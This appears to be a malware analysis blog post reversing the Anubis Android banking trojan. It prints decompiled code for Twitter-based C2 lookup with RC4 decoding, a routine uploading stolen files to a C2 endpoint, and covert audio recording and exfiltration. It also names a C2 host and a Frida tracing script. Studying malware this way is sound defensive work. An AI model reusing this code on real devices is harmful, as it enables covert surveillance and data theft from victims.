                    BankingApps aVar = SomeHttpClass.this.banking_apps;
                    if (i >= BankingApps.f332s.length) {
                        break;
                    }
                    String str2 = this.str;
                    BankingApps aVar2 = SomeHttpClass.this.banking_apps;
                    String str3 = BankingApps.f333t[i];
                    BankingApps aVar3 = SomeHttpClass.this.banking_apps;
                    this.str = str2.replace(str3, BankingApps.f332s[i]);
                    i++;
                }
                this.str = SomeHttpClass.this.mo230d(this.str);

we see a while, loop which iterates until variable i is grater than or equal to BankingApps.f332s.legth. the string returned from the previous operation is stored in str and then it has been asigned to str2. str3 is assigned with BankingApps.f333t[i]. then str is reassigned to itself with its every BankingApps.f333t[i] character being replaced with BankingApps.f332s[i], if that makes sense.

So its basically a loop that iterates through two arrays of characters, replacing one array’s character in the string str with the other ones corresponding character.

Lets take a look at what those arrays are…

/* renamed from: s */
    public static final String[] f332s = {"Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P", "A", "S", "D", "F", "G", "H", "J", "K", "L", "Z", "X", "C", "V", "B", "N", "M", "q", "w", "e", "r", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m", "=", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"};

    /* renamed from: t */
    public static final String[] f333t = {"需", "要", "意", "在", "中", "并", "没", "有", "个", "概", "念", "小", "语", "拼", "亡", "及", "注", "鲜", "新", "死", "之", "类", "阿", "努", "比", "拉", "丁", "化", "体", "系", "都", "只", "斯", "一", "套", "用", "恶", "件", "来", "标", "音", "的", "符", "号", "而", "不", "是", "字", "母", "寂", "寞", "肏", "你", "妈", "屄", "引", "脚", "吸", "员", "会", "膏", "药"};

well. this makes sense. Every chinese character in the str is replaced with an alphanumerical value. From that, we can assume the intended response for the http request to the url https://twitter.com/qweqweqwe is an html filled with chinese characters and every character in between "苏尔的开始", and "苏尔苏尔完" is will be stored in str, which will then be replaced with alphanumerical characters.

After the loop, str is reassigned to the return value of SomeHttpClass.mo230d(this.str).

    public String mo230d(String str) {
        this.consts2.getClass();
        return mo226c(str, "zanubis");
    }

Alright i guess this is how this malware got its name :). anyways, this method does nothing but calling another method with our string and zanubis as an arguments. And i think we should trace it with frida.

'use strict';

if (Java.available) {
    Java.perform(function() {
        var java_string = Java.use("java.lang.String");
        var some_http_class = Java.use("wocwvy.czyxoxmbauu.slsa.b");
        some_http_class.d.overload('java.lang.String').implementation = function(x) {
            send("[*] method called SomeHttpClass.mo230d(\""+x+"\")");
            var ret = this.d(x);
            if (ret != undefined) {
                send(" => return: "+ ret);
                return ret;
            }
            else {
                send(" => return: undefined");
                return Java.use('java.lang.String').$new("undefined");
            }
        }
    });
}

[!] callback -> [*] method called SomeHttpClass.mo230d("ZWViZGQ3NjRjOGZlOWNjMjAzODhhNzFhNzg4MDJi
")
[!] callback ->  => return: http://cdnjs.su
[!] callback -> [*] method called SomeHttpClass.mo230d("ZWViZGQ3NjRjOGZlOWNjMjAzODhhNzFhNzg4MDJi
")
[!] callback ->  => return: http://cdnjs.su
[!] callback -> [*] method called SomeHttpClass.mo230d("")
[!] callback ->  => return: 
[!] callback -> [*] method called SomeHttpClass.mo230d("")
[!] callback ->  => return:

It seems like MakeTwitterRequest is not the only function that calls SomeHttpClass.mo230d(). And doesnt that string looks familiar? yaee.. its the same string we saw in the shared preference xml file.

<string name="urls">ZWViZGQ3NjRjOGZlOWNjMjAzODhhNzFhNzg4MDJi&#10;    </string>

and the return value is a url. http://cdnjs.su, it is the same url that we met when we were analyzing SomeHttpClass.mo234e with frida, which will return after its been decoded if we request url key from the shared preference. So my assumption on SomeHttpClass.mo226c being a decoder function is true!

Since the web request that malware returns an empty string, we get nothing decoded :(.

take a look at SomeHttpClass.mo226c.

    public String mo226c(String str, String str2){
        try {
            return new String(new C0063a(str2.getBytes()).mo358a(mo223b(new String(Base64.decode(str, 0), "UTF-8"))));
        } catch (Exception unused) {
            return "";
        }
    }

So it does look like this function is not only a decoder but also a decrypter. Let’s take a look at class C0063a.

/* rename this to RC4 */
public class C0063a {

    [... code here]

    public C0063a(byte[] bArr) {
        this.f485a = m305c(bArr);
    }

C0063a constructor calls another method.

    private int[] m305c(byte[] key) {
        int[] iArr = new int[256];
        for (int i = 0; i < 256; i++) {
            iArr[i] = i;
        }
        int i2 = 0;
        for (int i3 = 0; i3 < 256; i3++) {
            i2 = (((i2 + iArr[i3]) + key[i3 % key.length]) + 256) % 256;
            swap(i3, i2, iArr);
        }
        return iArr;
    }

So what this does is, creates an int array of size 256, fill it with numbers from 0 - 255, loop through 0 - 255 and do below expression

    i2 = (((i2 + iArr[i3]) + key[i3 % key.length]) + 256) % 256;

well this looks like rc4 algorithm. swap function is pretty simple.

then the array is returned and following method is applied on it by the SomeHttpClass.mo226c method.

    private int[] m305c(byte[] bArr) {
        int[] iArr = new int[256];
        for (int i = 0; i < 256; i++) {
            iArr[i] = i;
        }
        int i2 = 0;
        for (int i3 = 0; i3 < 256; i3++) {
            i2 = (((i2 + iArr[i3]) + bArr[i3 % bArr.length]) + 256) % 256;
            swap(i3, i2, iArr);
        }
        return iArr;
    }

aand this confirms the assumption that this malware uses rc4 algorithm. However, unlike many other malware, anubis seems to use a hardcoded key, rather than generating a key on the fly, which is zanubis.

As a summery what MakeTwitterRequest does is,

    - sends a requests to the url `https://twitter.com/qweqweqwe`, which contains tweets in chinese.
    - read the response html in to a buffer and remove all the spaces.
    - save the string in between `苏尔的开始`, `苏尔苏尔完` of the response html in `str`.
    - for each chinese character in `str`, replace it with a corresponding alphanumerical character (which results in a base64 encoded string).
    - decode base64 encoded string in `str` and decrypt it using RC4, with key being equal to `zanubis` 
    - store return value back in `str`.

However we dont really know what malware expects from the reponse html and what is the use of decoded and decrypted data. But i suspect main purpose of this snippet is to extract C2 server addresses from the tweets of the user.

Now we can move onto another interesting methods of the SomeHttpClass.

    public String mo218b(Context context, String str, String str2) {
        C0067b bVar = new C0067b();
        String str3 = "";

method expects two string arguments other than the context argument. first, it initialize new variables, an object of class C0067b and a string.

then,

        if (str.equals("1")) {
            str3 = "/o1o/a3.php";
        }
        if (str.equals("2")) {
            str3 = "/o1o/a4.php";
        }
        if (str.equals("3")) {
            str3 = "/o1o/a5.php";
        }
        if (str.equals("4")) {
            str3 = "/o1o/a6.php";
        }
        if (str.equals("5")) {
            str3 = "/o1o/a7.php";
        }
        if (str.equals("6")) {
            str3 = "/o1o/a8.php";
        }
        if (str.equals("7")) {
            str3 = "/o1o/a9.php";
        }
        if (str.equals("10")) {
            str3 = "/o1o/a10.php";
        }
        if (str.equals("11")) {
            str3 = "/o1o/a11.php";
        }
        if (str.equals("12")) {
            str3 = "/o1o/a12.php";
        }
        if (str.equals("13")) {
            str3 = "/o1o/a13.php";
        }
        if (str.equals("14")) {
            str3 = "/o1o/a14.php";
        }
        if (str.equals("15")) {
            str3 = "/o1o/a15.php";
        }

there’s a bunch of if statements, each checks whether the first string argument is equal to some number. if so, it appends /o1o/a(x).php to the previously initialized string str3. Well those strings looks like php endpoints but the domain is not specified here.

    try {
            String e = getSharedPreference(context, "url");
            return bVar.mo363a(e + str3, str2);
        } catch (Exception unused) {
            mo213a("ERROR", "Class nwtdtqovhkgkna, POST -> URL");
            return null;
        }
    }

inside the try block we see a call to a famililar method, getSharedPreference. In this case key is "url". well if search the xml, you wont find any.

here is what method mo363a does,

    /* renamed from: a */
    public String mo363a(String str, String str2) {
        SomeHttpClass bVar = new SomeHttpClass();
        AsyncTaskC0079a aVar = new AsyncTaskC0079a();
        aVar.execute(str, str2);
        try {
            return bVar.GetMiddleString((String) aVar.get(), "<tag>", "</tag>");
        } catch (Exception unused) {
            return "";
        }
    }

So i guess this is what we saw earlier when we hooked the function that parses response html from the twitter request with frida. Basically this method starts a HttpConnection and send the required information to the target php endpoint. Therefore we can rename the method to exfiltrate.

Now the problem is, how is this thing retrieving value of a shared preference with a non-existing key?

Probably because malware is generating and writing the url dynamically to the xml. Let’s analyze the method that makes use of above php endpoints.

public void mo211a(Context context, String str, String str2, String str3) { 
        String e = getSharedPreference(context, "websocket");
        StringBuilder sb = new StringBuilder();
        sb.append(e);
        this.consts2.getClass();
        sb.append("/o1o/a1.php");
        String sb2 = sb.toString();
        
        [... more code]

above method calls getSharedPreference with key being equal to websocket and append the return value to a StringBuilder sb. well if we grep that part out from the xml,

   <string name="websocket"></string>

it’s empty. Well my guess is that this will be filled later by the malware.

then sb is appended with /o1o/a1.php, which is a php endpoint, and the resulting string (url) is stored in sb2.

        File file = new File(str);
        byte[] a = ReadFile(file);
        if (str2.equals("")) {
            str2 = mo247q(context) + "-" + file.getName();
        }

then it creates a file taking the second argument as the filename and passes the file as an argument to SomeHttpClass.ReadFile. then it check if third argument (str2) is an empty string, if so, it calls another method named SomeHttpClass.mo247q, concatanate the return value with - and the file’s name.

first of all, all what ReadFile method does is, as the name implies, reading a file and returning it as a byte array. in this case, it reads file specified in str and returns the contents, which will then be stored in byte array a.

Now let’s take a look at SomeHttpClass.mo247q.

    public String mo247q(Context context) {
        String string = Settings.Secure.getString(context.getContentResolver(), "android_id");
        if (string != "") {
            return string;
        }
        return "35" + (Build.BOARD.length() % 10) + (Build.BRAND.length() % 10) + (Build.CPU_ABI.length() % 10) + (Build.DEVICE.length() % 10) + (Build.DISPLAY.length() % 10) + (Build.HOST.length() % 10) + (Build.ID.length() % 10) + (Build.MANUFACTURER.length() % 10) + (Build.MODEL.length() % 10) + (Build.PRODUCT.length() % 10) + (Build.TAGS.length() % 10) + (Build.TYPE.length() % 10) + (Build.USER.length() % 10);
    }

So its clear that this function is simply is getting the SSAID of the current user/app. However, if it is failed to extract this information, it creates a unique ID by adding 35 to the remainders of various IDs when they are divided by 10.

My assumption is that, malware might be using this SSAID to keep a track on devices.

        HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(sb2).openConnection();
        httpURLConnection.setUseCaches(false);
        httpURLConnection.setDoOutput(true);
        httpURLConnection.setRequestMethod("POST");
        httpURLConnection.setRequestProperty("Connection", "Keep-Alive");
        httpURLConnection.setRequestProperty("Cache-Control", "no-cache");
        httpURLConnection.setRequestProperty("Content-Type", "multipart/form-data;boundary=" + "*****");

in the above snippet, method SomeHttpClass.mo211a creates a new HttpURLConnection to the url stored in sb2. then it modifies some attributes of the Http Connection. for example, it first sets UseCaches to false, DoOutput to true and RequestMethod to "POST", and it suggests that the request method this method is going to use is “POST”. It also sets RequestProperties like, "Connection" to "Keep-Alive", "Cache-Control" to "no-cache" and "Content-Type" to "multipart/form-data;boundary=*****"

        DataOutputStream dataOutputStream = new DataOutputStream(httpURLConnection.getOutputStream());
        dataOutputStream.writeBytes("--" + "*****" + "\r\n");
        StringBuilder sb3 = new StringBuilder();
        sb3.append("Content-Disposition: form-data; name=\"serverID\"");
        sb3.append("\r\n");
        dataOutputStream.writeBytes(sb3.toString());
        dataOutputStream.writeBytes("\r\n");

then it creates a DataOutputStream out from the HttpURLConnection it created before. then it writes following string to the output stream.

--*****\r\n

another StringBuilder is created named sb3 and the string

"Content-Disposition: form-data; name=\"serverID\""\r\n"

is appended to it. then sb3 is converted into a string and written to the output steam it opened before.

        dataOutputStream.write("getfiles".getBytes());
        dataOutputStream.writeBytes("\r\n");
        dataOutputStream.writeBytes("--" + "*****" + "--" + "\r\n");

then following strings

getfiles\r\n
--*****--\r\n

        StringBuilder sb4 = new StringBuilder();
        sb4.append("--");
        sb4.append("*****");
        sb4.append("\r\n");
        dataOutputStream.writeBytes(sb4.toString());

then again,

--****\r\n

is written.

        dataOutputStream.writeBytes("Content-Disposition: form-data; name=\"" + str3 + "\";filename=\"" + str2 + "\"" + "\r\n");
        dataOutputStream.writeBytes("\r\n");
        dataOutputStream.write(a);
        dataOutputStream.writeBytes("\r\n");
        dataOutputStream.writeBytes("--" + "*****" + "--" + "\r\n");
        dataOutputStream.flush();
        dataOutputStream.close();

here its writing some strings to the output stream again first one being

“Content-Disposition: form-data; name="” + str3 + “";filename="” + str2 + “"” + “\r\n\r\n”,

aaaaand guess what is next? the file it read earlier, which stored in byte array a. From that, it can be concluded that this method is doing some data exfiltration work.

then again, it writes another string to the output stream.

--*****--\r\n

and then output stream is flushed and closed.

Well then what are those weird strings and what is the file? well i think those are some kind of markers to indicate end and start of the stream. maybe im wrong. who knows.

        BufferedInputStream bufferedInputStream = new BufferedInputStream(httpURLConnection.getInputStream());
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(bufferedInputStream));
        StringBuilder sb5 = new StringBuilder();
        while (true) {
            String readLine = bufferedReader.readLine();
            if (readLine != null) {
                sb5.append(readLine);
                sb5.append("\n");
            } else {
                bufferedReader.close();
                mo213a("HTTP", "HTTPRESPONSE: " + sb5.toString());
                bufferedInputStream.close();
                httpURLConnection.disconnect();
                return;
            }
        }
    }

at the end of the method, we can see it creates an input stream out of the http connection, as well as a buffer reader. then a StringBuilder is also declared.

the loop will continue until the local readline is not equal to null. and if so, it appends StringBuilder with the line that just read.

else, it closes both BufferedReader and BufferedInputStream and disconnects the HttpURLConnection.

let’s scan the decompiled code to indentify cross references so we can get an idea about which files will be sent to the endpoint. (I renamed the method to SendFileToEndpoint so that it makes more sense :3 )

Audio Recording

and if we click one those cross references, we’ll end up inside a runnable thread.

    public void mo417a(final Context context, final String str, final int i) {
        final MediaRecorder mediaRecorder = new MediaRecorder();
        this.cls.mo213a("SOUND", "START RECORD SOUND");
        this.f523b = false;
        mediaRecorder.setAudioSource(1);
        mediaRecorder.setOutputFormat(3);
        mediaRecorder.setAudioEncoder(1);
        mediaRecorder.setOutputFile(str);

Well this looks scary but yeah. we see a MediaRecorder is being initialized. then it starts recording sound and set AudioSource to AMR_NB, OutputFormat to AMR_NB, AudioEncoder to AMR_NB and OutputFile to str, which is the second parameter.

        Thread thread = new Thread(new Runnable() {

            public void run() {
                SomeHttpClass bVar;
                String str;
                StringBuilder sb;

this is the runnable thread part i talked above. here it does nothing other than declaring some variables.

                try {
                    Thread.sleep((long) (i * 1000));
                    AudioRecord.this.cls.mo213a("SOUND", "STOP RECORD SOUND");
                    try {
                        mediaRecorder.stop();
                        mediaRecorder.release();
                        AudioRecord.this.f523b = true;
                        Log.e("FILE", "" + str);
                        AudioRecord.this.cls.SendFileToEndpoint(context, str, "", "sound[]");
                    } catch (Exception e) {
                        e = e;
                        bVar = AudioRecord.this.cls;
                        str = "ERROR";
                        sb = new StringBuilder();
                        sb.append("Record Sound! ");
                        sb.append(e);
                        bVar.mo213a(str, sb.toString());
                    }

inside the try block, we can it calls Thread.sleep for i * 1000, where i is the third parameter. we see another call SomeHttpClass.mo213a but this time with "STOP RECORD SOUND" as the second argument (compared to the previous call’s second argument being “START RECORD SOUND”). So it looks like the function starts recording audio, sleep for user (in this case programmer) specified time and stop recording.

then there’s try block inside the try block, which basically stops the mediaRecorder and release it. then it sets some boolean variable to true, i guess which is responsible to tracking if it is still recording audio or not (and im gonna rename it to something that makes more sense).

then we see what we ve been expecting to see, the cross references. it passes str as the second argument (filename) and an empty string and sound[] as third and fouth arguments.

inside the catch block, it just creates a string containing the error and pass it to SomeHttpClass.mo213a.

                } catch (InterruptedException unused) {
                    AudioRecord.this.cls.mo213a("SOUND", "STOP RECORD SOUND");
                    try {
                        mediaRecorder.stop();
                        mediaRecorder.release();
                        AudioRecord.this.f523b = true;
                        Log.e("FILE", "" + str);
                        AudioRecord.this.cls.SendFileToEndpoint(context, str, "", "sound[]");
                    } catch (Exception e2) {
                        e = e2;
                        bVar = AudioRecord.this.cls;
                        str = "ERROR";
                        sb = new StringBuilder();
                        sb.append("Record Sound! ");
                        sb.append(e);
                        bVar.mo213a(str, sb.toString());
                    }

                    [... another catch block that does the same thing]
                }
            }
        });

SomeHttpClass.mo213a is called with the same argument as the try block. Inside it, theres another try catch block, both do the same thing as the previous try block.

same applies to this block too…

        try {
            mediaRecorder.prepare();
            mediaRecorder.start();
            thread.start();
        } catch (IOException unused) {
        }
    }

this is the block that actually starts the thread :). Soo what this method actually does is, it starts recording audio on the given source, waits until i amount of time and stops recording. then it calls our SomeHttpClass.SendFileToEndpoint method to send it to an endpoint so attacker can receive the file.

Banking Apps

Lets get an idea of how this malware gets banking applications.

/* renamed from: wocwvy.czyxoxmbauu.slsa.a */
public class BankingApps {

    /* renamed from: h */
    public static final String[] f321h = "[az]aktivləşdirmək::[sq]aktivizoni::[am]የሚሰጡዋቸውን::[en]activate::[ar]تفعيل::[hy]ակտիվացնել::[af]aktiveer::[eu]aktibatu::[ba]актив::[be]актываваць::[bn]সক্রিয়::[my]သက်ဝင်::[bg]активира::[bs]aktiviraj::[cy]activate::[hu]aktiválja::[vi]kích hoạt::[ht]aktive::[gl]activar::[nl]activeren::[mrj]активировать::[el]ενεργοποίηση::[ka]გააქტიურება::[gu]સક્રિય::[da]aktivere::[he]הפעל::[yi]אַקטאַווייט::[id]mengaktifkan::[ga]gníomhachtaigh::[is]virkja::[es]activar::[it]attivare::[kk]іске қосу::[kn]ಸಕ್ರಿಯಗೊಳಿಸಿ::[ca]activar::[ky]активировать::[zh]激活::[ko]활성화::[xh]sebenzisa::[km]ធ្វើឱ្យ::[lo]ກະຕຸ້ນ::[la]eu::[lv]aktivizēt::[lt]įjungti::[lb]aktivéieren::[mk]активирајте::[mg]mampihetsika::[ms]mengaktifkan::[ml]സജീവമാക്കുക::[mt]jattiva::[mi]whakahohe::[mr]सक्रिय::[mhr]чӱкташ::[mn]идэвхжүүлэх::[de]aktivieren::[ne]सक्रिय::[no]aktiver::[pa]ਸਰਗਰਮ::[pap]primi::[fa]فعال::[pl]aktywować::[pt]activar::[ro]activa::[ru]активировать::[ceb]activate::[sr]активирај::[si]ක්රියාත්මක::[sk]aktivácia::[sl]vključi::[sw]kuamsha::[su]aktipkeun::[tl]i-activate::[tg]фаъол::[th]เปิดใช้งาน::[ta]செயல்படுத்த::[tt]активировать::[te]సక్రియం::[tr]etkinleştirmek::[udm]активировать::[uz]faollashtirish::[uk]активувати::[ur]چالو::[fi]aktivoi::[fr]activer::[hi]सक्रिय::[hr]aktivirati::[cs]aktivovat::[sv]aktivera::[gd]gnìomhaich::[eo]aktivigi::[et]aktiveerige::[jv]ngaktifake::[ja]活性化".split("::");

    /* renamed from: i */
    public static final String[] f322i = "[az]Yandırmaq üçün giriş::[sq]Mundësimi i aksesit për::[am]ደረጃ መድረስ ደረጃ አልተሰጠውም::[en]Enable access for::[ar]تمكين الوصول إلى::[hy]Միացնել մուտք::[af]In staat stel om toegang vir::[eu]Gaitu sarbidea::[ba]Эсенә инеү өсөн::[be]Уключыце доступ для::[bn]এক্সেস সক্রিয় জন্য::[my]ဖစ္ရပ္တည္ႏေ::[bg]Включете достъп за::[bs]Omogućiti pristup::[cy]Galluogi mynediad ar gyfer::[hu]Hozzáférés engedélyezése a::[vi]Cho phép truy cập cho::[ht]Pèmèt aksè pou::[gl]Posibilitar o acceso para::[nl]Toegang voor::[mrj]Пыртен кердеш::[el]Ενεργοποιήστε την πρόσβαση για::[ka]საშუალებას დაშვება::[gu]સક્રિય ઍક્સેસ માટે::[da]Aktiver adgang til::[he]לאפשר גישה::[yi]געבן צוטריט פֿאַר::[id]Mengaktifkan akses untuk::[ga]A chumas rochtain a fháil ar do::[is]Virkja aðgang::[es]Habilitar el acceso para::[it]Abilitare l'accesso per::[kk]Қосыңыз қол жеткізу үшін::[kn]ಸಕ್ರಿಯಗೊಳಿಸಿ ಪ್ರವೇಶ::[ca]Permetre l'accés per::[ky]Включите кирүү үчүн::[zh]使访问::[ko]활성화에 대한 액세스::[xh]Yenza ukufikelela kuba::[km]បើកការចូលដំណើរសម្រាប់::[lo]ເຮັດໃຫ້ສາມາດເຂົ້າເຖິງສໍາລັບ::[la]Morbi accessum ad::[lv]Ieslēdziet piekļuve::[lt]Įjunkite galimybė::[lb]Veröffentlechen Si den Accès fir::[mk]Им овозможи пристап за::[mg]Alefaso ny fidirana ho::[ms]Akses untuk membolehkan::[ml]Enable access വേണ്ടി::[mt]Tippermetti l-aċċess għall -::[mi]Taea ai te whai wāhi mō te::[mr]सक्षम प्रवेश::[mhr]Пураш пурташ::[mn]Идэвхжүүлэх хандах::[de]Schalten Sie den Zugang für::[ne]पहुँच सक्षम पार्नुहोस् ��ागि::[no]Tillat tilgang for::[pa]ਯੋਗ ਲਈ ਪਹੁੰਚ::[pap]Abilidat di aceso na::[fa]فعال کردن دسترسی برای::[pl]Włącz dostęp do::[pt]Habilite o acesso para::[ro]Activați acces pentru::[ru]Включите доступ для::[ceb]Paghimo access alang sa::[sr]Укључите приступ за::[si]සක්රීය ප්රවේශය සඳහා::[sk]Povoliť prístup pre::[sl]Omogočanje dostopa za::[sw]Kuwawezesha access kwa ajili ya::[su]Ngaktipkeun aksés pikeun::[tl]Paganahin ang pag-access para sa::[tg]Рӯй оид ба дастрасӣ ба::[th]เปิดใช้งานสำหรับเข้าถึง::[ta]இயக்கு அனுமதி::[tt]Включите керү өчен::[te]ఎనేబుల్ యాక్సెస్ కోసం::[tr]Açın ve erişim için::[udm]Гожтоно кариськи понна::[uz]Uchun kirish imkonini beradi::[uk]Увімкніть доступ для::[ur]قابل رسائی کے لئے::[fi]Mahdollistaa pääsyn::[fr]Activer l'accès pour::[hi]पहुँच सक्षम करें के लिए::[hr]Uključite pristup za::[cs]Povolte přístup pro::[sv]Aktivera åtkomst för::[gd]Cuir cothrom airson::[eo]Ebligi aliron por::[et]Lülitage juurdepääs::[jv]Ngaktifake akses kanggo::[ja]アクセスのための".split("::");

    /* renamed from: j */
    public static final String[] f323j = "[az]İzin ver::[sq]Të lejojë::[am]የሚሰጡዋቸውን::[en]Allow::[ar]تسمح::[hy]Լուծել::[af]Laat::[eu]Baimendu::[ba]Рөхсәт::[be]Дазволіць::[bn]অনুমতি::[my]ခွင့်ပြု::[bg]Оставя се::[bs]Dozvoliti::[cy]Caniatáu::[hu]Lehetővé teszi,::[vi]Cho phép::[ht]Pèmèt::[gl]Permitir::[nl]Toestaan::[mrj]Разрешӓйӹ::[el]Επιτρέπεται::[ka]საშუალებას::[gu]પરવાનગી આપે છે::[da]Tillad::[he]לאפשר::[yi]לאָזן::[id]Memungkinkan::[ga]Cheadú::[is]Leyfa::[es]Permitir::[it]Consentire::[kk]Рұқсат етілсін::[kn]ಅವಕಾಶ::[ca]Permetre::[ky]Уруксат::[zh]允许::[ko]용::[xh]Vumela::[km]អនុញ្ញាត::[lo]ອະນຸຍາດ::[la]Sino::[lv]Atļaut::[lt]Leisti::[lb]Zulassen::[mk]Дозволете::[mg]Mamela::[ms]Membenarkan::[ml]അനുവദിക്കുക::[mt]Tippermetti::[mi]Tukua::[mr]परवानगी::[mhr]Кӧнеда::[mn]Зөвшөөрөх::[de]Zulassen::[ne]अनुमति::[no]La::[pa]ਸਹਾਇਕ ਹੈ::[pap]Permití::[fa]اجازه می دهد::[pl]Pozwól::[pt]Permitir::[ro]Permite::[ru]Разрешить::[ceb]Pagtugot::[sr]Дозволи::[si]ඉඩ::[sk]Povoliť::[sl]Dovolite,::[sw]Kuruhusu::[su]Ngidinan::[tl]Payagan ang mga::[tg]Иҷозат::[th]อนุญาต::[ta]அனுமதிக்க::[tt]Игъланнары::[te]అనుమతిస్తుంది.::[tr]İzin ver::[udm]Разрешить::[uz]Ruxsat::[uk]Дозволити::[ur]کی اجازت::[fi]Salli::[fr]Autoriser::[hi]की अनुमति::[hr]Dopusti::[cs]Povolit::[sv]Tillåta::[gd]Ceadaich::[eo]Permesi::[et]Luba::[jv]Ngidini::[ja]許可".split("::");

    /* renamed from: k */
    public static final String[] f324k = "[az]Bəli::[sq]Po::[am]አዎ::[en]Yes::[ar]نعم::[hy]Այո::[af]Ja::[eu]Bai::[ba]Д::[be]Ды::[bn]হ্যাঁ::[my]ဟုတ်ကဲ့::[bg]Да::[bs]- ::[cy]Ie::[hu]Igen::[vi]Yes::[ht]Wi::[gl]Si::[nl]Ja::[mrj]Мане::[el]Ναι::[ka]დიახ::[gu]હા::[da]Ja::[he]כן::[yi]יא::[id]Ya::[ga]Tá::[is]Já::[es]Sí::[it]Sì::[kk]Иә::[kn]ಹೌದು::[ca]Sí::[ky]Ооба::[zh]是的::[ko]네::[xh]Ewe::[km]បាទ::[lo]ແມ່ນແລ້ວ::[la]Etiam::[lv]Jā::[lt]Taip::[lb]Jo::[mk]Yes::[mg]Eny::[ms]Ya::[ml]അതെ::[mt]Iva::[mi]Ae::[mr]होय::[mhr]Да::[mn]Тийм ээ::[de]Ja::[ne]हो::[no]Ja::[pa]ਜੀ::[pap]Sí::[fa]بله::[pl]Tak::[pt]Sim::[ro]Da::[ru]Да::[ceb]Oo::[sr]Да::[si]ඔව්::[sk]Áno::[sl]Da,::[sw]Ndiyo::[su]Enya::[tl]Oo::[tg]Ҳа::[th]ใช่แล้ว::[ta]ஆமாம்::[tt]Әйе::[te]అవును::[tr]Evet::[udm]Мед::[uz]Ha::[uk]Так::[ur]جی ہاں::[fi]Kyllä::[fr]Oui::[hi]हाँ::[hr]Da::[cs]Ano::[sv]Ja::[gd]Yes::[eo]Jes::[et]Jah::[jv]Ya::[ja]あり".split("::");

    /* renamed from: l */
    public static final String[] f325l = "[az]sil::[sq]uninstall::[am].::[en]uninstall::[ar]إلغاء::[hy]հեռացնել::[af]verwyder::[eu]desinstalatu::[ba]бөтөрөп::[be]выдаліць::[bn]আনইনস্টল::[my]ဖယ်ရှား::[bg]изтриете::[bs]deinstaliranje::[cy]uninstall::[hu]uninstall::[vi]rõ ràng::[ht]désinstaller::[gl]instrucións para::[nl]verwijderen::[mrj]удалена::[el]απεγκατάσταση::[ka]uninstall::[gu]અનઇન્સ્ટોલ કરો::[da]afinstaller::[he]הסרת התקנה::[yi]נעם אַוועק::[id]uninstall::[ga]treoracha::[is]flutningur::[es]desinstalar::[it]disinstallare::[kk]жою::[kn]ಅಸ್ಥಾಪಿಸು::[ca]desinstal · lar::[ky]таштоо::[zh]卸载::[ko]제거::[xh]imizekelo::[km]លុប::[lo]ຖ::[la]uninstall::[lv]atinstalēt::[lt]pašalinti::[lb]deinstallieren::[mk]деинсталирање::[mg]fanesorana::[ms]pemasangan::[ml]അൺഇൻസ്റ്റാൾ::[mt]istruzzjonijiet::[mi]wetetāuta::[mr]विस्थापित::[mhr]кораҥдаш::[mn]устгах::[de]deinstallieren::[ne]स्थापना रद्द::[no]avinstaller::[pa]ਅਣ::[pap]dental::[fa]حذف::[pl]usunąć::[pt]desinstalação::[ro]dezinstalare::[ru]удалить::[ceb]uninstall::[sr]уклонити::[si]අස්ථාපනය කරන්න::[sk]odinštalovať::[sl]odstrani::[sw]kuondolewa::[su]uninstall::[tl]i-uninstall ang mga::[tg]чӣ тавр ба хориҷ::[th]ถอนการติดตั้ง::[ta]மென்பொருளை நீக்க::[tt]бетерә::[te]అన్ఇన్స్టాల్::[tr]Kaldır::[udm]палэнтыны::[uz]adware virus olib tashlash uchun::[uk]видалити::[ur]انسٹال::[fi]uninstall::[fr]désinstaller::[hi]स्थापना रद्द करें::[hr]izbrisati::[cs]odinstalovat::[sv]avinstallera::[gd]dì-stàlaich::[eo]uninstall::[et]uninstall::[jv]busak instal::[ja]アンインストール".split("::");

    /* renamed from: m */
    public static final String[] f326m = "[az]sil::[sq]për të hequr::[am]ማስወገድ::[en]to remove::[ar]لإزالة::[hy]հեռացնել::[af]te verwyder::[eu]kendu::[ba]бөтөрөп::[be]выдаліць::[bn]মুছে ফেলার জন্য::[my]ဖယ်ရှားရန်::[bg]изтриете::[bs]da ukloni::[cy]i gael gwared ar::[hu]eltávolítani::[vi]để loại bỏ::[ht]pou retire::[gl]para eliminar::[nl]verwijderen::[mrj]удалена::[el]διαγραφή::[ka]უნდა ამოიღონ::[gu]દૂર કરવા માટે::[da]for at fjerne::[he]כדי להסיר::[yi]צו באַזייַטיקן::[id]untuk menghapus::[ga]a bhaint::[is]til að fjarlægja::[es]eliminar::[it]rimuovere::[kk]жою::[kn]ತೆಗೆದುಹಾಕಲು::[ca]per eliminar::[ky]таштоо::[zh]删除::[ko]를 제거::[xh]ukususa::[km]ដើម្បីយកចេញ::[lo]ເພື່ອເອົາ::[la]ad tollendam::[lv]dzēst::[lt]pašalinti::[lb]ewechhuelen::[mk]за да се отстрани::[mg]mba hanesorana::[ms]untuk mengeluarkan::[ml]നീക്കം::[mt]biex tneħħi::[mi]ki te tango::[mr]काढा::[mhr]кораҥдаш::[mn]устгах::[de]entfernen::[ne]हटाउन::[no]for å fjerne::[pa]ਨੂੰ ਹਟਾਉਣ ਲਈ::[pap]kita::[fa]برای حذف::[pl]usunąć::[pt]remover::[ro]elimina::[ru]удалить::[ceb]aron sa pagpapahawa::[sr]уклонити::[si]ඉවත් කිරීමට::[sk]odstrániť::[sl]odstrani::[sw]kuondoa::[su]pikeun miceun::[tl]upang alisin::[tg]чӣ тавр ба хориҷ::[th]เพื่อลบ::[ta]நீக்க::[tt]бетерә::[te]తొలగించడానికి::[tr]sil::[udm]палэнтыны::[uz]olib tashlash uchun::[uk]видалити::[ur]کو ہٹانے کے لئے::[fi]poistaa::[fr]supprimer::[hi]को दूर करने के लिए::[hr]izbrisati::[cs]odstranit::[sv]för att ta bort::[gd]a thoirt air falbh::[eo]forigi::[et]kustuta::[jv]kanggo mbusak::[ja]除".split("::");

    /* renamed from: n */
